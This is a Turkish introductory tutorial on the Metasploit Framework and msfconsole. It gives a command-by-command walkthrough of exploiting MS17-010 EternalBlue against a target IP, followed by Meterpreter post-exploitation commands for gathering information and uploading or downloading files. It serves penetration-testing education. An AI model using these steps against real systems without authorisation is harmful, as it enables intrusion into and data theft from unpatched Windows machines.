Metasploit Framework ve msfconsole’a Giriş
Metasploit, güvenlik profesyonellerinin güvenlik açıklarını belirlemesine ve sistemleri test etmek ve güvenliğini sağlamak için bunlardan yararlanmasına yardımcı olan güçlü ve yaygın olarak kullanılan bir penetrasyon testi çerçevesidir.
Metasploit Framework Nedir?
Metasploit, güvenlik profesyonellerinin güvenlik açıklarını belirlemesine ve sistemleri test etmek ve güvenliğini sağlamak için bunlardan yararlanmasına yardımcı olan güçlü ve yaygın olarak kullanılan bir penetrasyon testi çerçevesidir.
msfconsole Nedir?
msfconsole, Metasploit Framework’ün komut satırı arayüzüdür. Kullanıcıların modülleri yükleyip çalıştırmalarına, hedef sistemler üzerinde testler yapmalarına ve güvenlik açıklarını sömürmelerine olanak tanır. Kullanımı oldukça esnek ve güçlüdür.
msfconsole’u Başlatma:
msfconsole
msfconsole Kullanımı
Temel Komutlar
- help: Mevcut komutların listesini gösterir.
- search [keyword]: Belirli bir modülü arar.
- use [module]: Belirli bir modülü seçer.
- show options: Seçilen modülün seçeneklerini gösterir.
- set [option] [value]: Modül seçeneklerini yapılandırır.
- exploit/run: Modülü çalıştırır.
Bir Örnek Saldırı Senaryosu:
MS17–010 EternalBlue Güvenlik Açığını Sömürme Adımları
İlk olarak, msfconsole’u başlatın:
msfconsole
EternalBlue (MS17–010) güvenlik açığını sömürmek için kullanılacak modülü arayın:
search eternalblue
Arama sonuçlarında, exploit/windows/smb/ms17_010_eternalblue modülünü seçin:
use exploit/windows/smb/ms17_010_eternalblue
Index numarasını kullanarak modülü seçebilirsiniz:
use 0
Seçilen modülün yapılandırma seçeneklerini görüntüleyin:
show options
Hedef sistemin IP adresini RHOSTS seçeneğine ayarlayın:
set RHOSTS <IP>
Saldırganın (kendi) IP adresini LHOST seçeneğine ayarlayın:
set LHOST <IP>
Modülü çalıştırarak saldırıyı başlatın:
exploit
Oturum Yönetimi
sessions -l
Açılan oturuma bağlanmak için:
sessions -i [session_id]
Sömürü Sonrası İşlemler
Meterpreter oturumu içindeyken, çeşitli sömürü sonrası işlemleri gerçekleştirebilirsiniz.
Bilgi Toplama:
sysinfo
Sistem bilgilerini gösterir.
getuid
Mevcut kullanıcı kimliğini gösterir.
ps
Hedef sistemdeki mevcut işlemleri listelemek için kullanılır.
Dosya İşlemleri:
upload /local/path /remote/path
Dosya yükleme.
download /remote/path /local/path
Dosya indirme.
Bu adımları takip ederek EternalBlue (MS17–010) güvenlik açığını başarıyla sömürmüş olursunuz.
Metasploit Framework, güvenlik testleri ve etik hacking için vazgeçilmez bir araçtır. Bu yazıda msfconsole’un temel kullanımını ele aldık. Daha ileri seviyede kullanım için Metasploit’in resmi dokümantasyonuna ve topluluk kaynaklarına başvurabilirsiniz.
Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit
Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec